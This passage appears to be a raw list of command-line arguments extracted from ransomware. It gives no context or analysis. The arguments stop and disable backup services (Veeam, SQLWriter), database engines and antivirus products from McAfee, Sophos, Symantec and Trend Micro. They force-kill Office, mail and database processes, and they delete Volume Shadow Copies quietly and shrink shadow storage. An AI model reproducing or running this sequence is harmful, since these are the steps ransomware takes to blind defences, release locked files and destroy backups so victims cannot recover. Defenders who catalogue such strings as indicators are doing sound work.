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MSSQLFDLauncher$SYSTEM_BGC /y stop macmnsvc /y stop VeeamCloudSvc /y stop MSSQLFDLauncher$TPS /y stop masvc /y stop MSSQLFDLauncher$TPSAMA /y stop MBAMService /y stop VeeamDeploySvc /y stop MSSQLSERVER /y stop MBEndpointAgent /y stop VeeamEnterpriseManagerSvc /y stop MSSQLServerADHelper /y stop McAfeeEngineService /y stop VeeamHvIntegrationSvc /y stop MSSQLServerADHelper100 /y stop McAfeeFramework /y stop VeeamMountSvc /y stop MSSQLServerOLAPService /y stop McAfeeFrameworkMcAfeeFramework /y stop MySQL57 /y stop McShield /y stop VeeamRESTSvc /y stop MySQL80 /y stop McTaskManager /y stop OracleClientCache80 /y stop mfefire /y stop wbengine /y stop mfemms /y stop RESvc /y stop mfevtp /y stop sms_site_sql_backup /y stop SQLAgent$BKUPEXEC /y stop MSSQL$SOPHOS /y stop SQLAgent$CITRIX_METAFRAME /y stop sacsvr /y stop SQLAgent$CXDB /y stop SAVAdminService /y stop SQLAgent$ECWDB2 /y stop SAVService /y stop SQLAgent$PRACTTICEBGC /y stop SepMasterService /y stop SQLAgent$PRACTTICEMGT /y stop ShMonitor /y stop SQLAgent$PROD /y stop Smcinst /y stop SQLAgent$PROFXENGAGEMENT /y stop SmcService /y stop SQLAgent$SBSMONITORING /y stop SntpService /y stop SQLAgent$SHAREPOINT /y stop sophossps /y stop SQLAgent$SQL_2008 /y stop SQLAgent$SOPHOS /y stop SQLAgent$SQLEXPRESS /y stop svcGenericHost /y stop SQLAgent$SYSTEM_BGC /y stop swi_filter /y stop SQLAgent$TPS /y stop swi_service /y stop SQLAgent$TPSAMA /y stop swi_update /y stop swi_update_64 /y stop SQLAgent$VEEAMSQL2012 /y stop TmCCSF /y stop SQLBrowser /y stop tmlisten /y stop SQLSafeOLRService /y stop TrueKey /y stop SQLSERVERAGENT /y stop TrueKeyScheduler /y stop SQLTELEMETRY /y stop TrueKeyServiceHelper /y stop SQLTELEMETRY$ECWDB2 /y stop WRSVC /y stop mssql$vim_sqlexp /y stop vapiendpoint /y config Dnscache start= auto config FDResPub start= auto config SSDPSRV start= auto config upnphost start= auto config SQLTELEMETRY start= disabled config SQLTELEMETRY$ECWDB2 start= disabled config SQLWriter start= disabled config SstpSvc start= disabled /IM mspub.exe /F /IM mydesktopqos.exe /F /IM mydesktopservice.exe /F /IM mysqld.exe /F /IM sqbcoreservice.exe /F /IM firefoxconfig.exe /F /IM agntsvc.exe /F /IM thebat.exe /F /IM steam.exe /F /IM encsvc.exe /F /IM excel.exe /F /IM CNTAoSMgr.exe /F /IM sqlwriter.exe /F /IM tbirdconfig.exe /F /IM dbeng50.exe /F /IM thebat64.exe /F /IM ocomm.exe /F /IM infopath.exe /F /IM mbamtray.exe /F /IM zoolz.exe /F IM thunderbird.exe /F /IM dbsnmp.exe /F /IM xfssvccon.exe /F /IM Ntrtscan.exe /F /IM isqlplussvc.exe /F /IM onenote.exe /F /IM PccNTMon.exe /F /IM msaccess.exe /F /IM outlook.exe /F /IM tmlisten.exe /F /IM msftesql.exe /F /IM powerpnt.exe /F /IM visio.exe /F /IM winword.exe /F /IM mysqld-nt.exe /F /IM wordpad.exe /F /IM mysqld-opt.exe /F /IM ocautoupds.exe /F /IM ocssd.exe /F /IM oracle.exe /F /IM sqlagent.exe /F /IM sqlbrowser.exe /F /IM sqlservr.exe /F /IM synctime.exe /F Delete Shadows /all /quiet resize shadowstorage /for=c: /on=c: /maxsize=401MB resize shadowstorage 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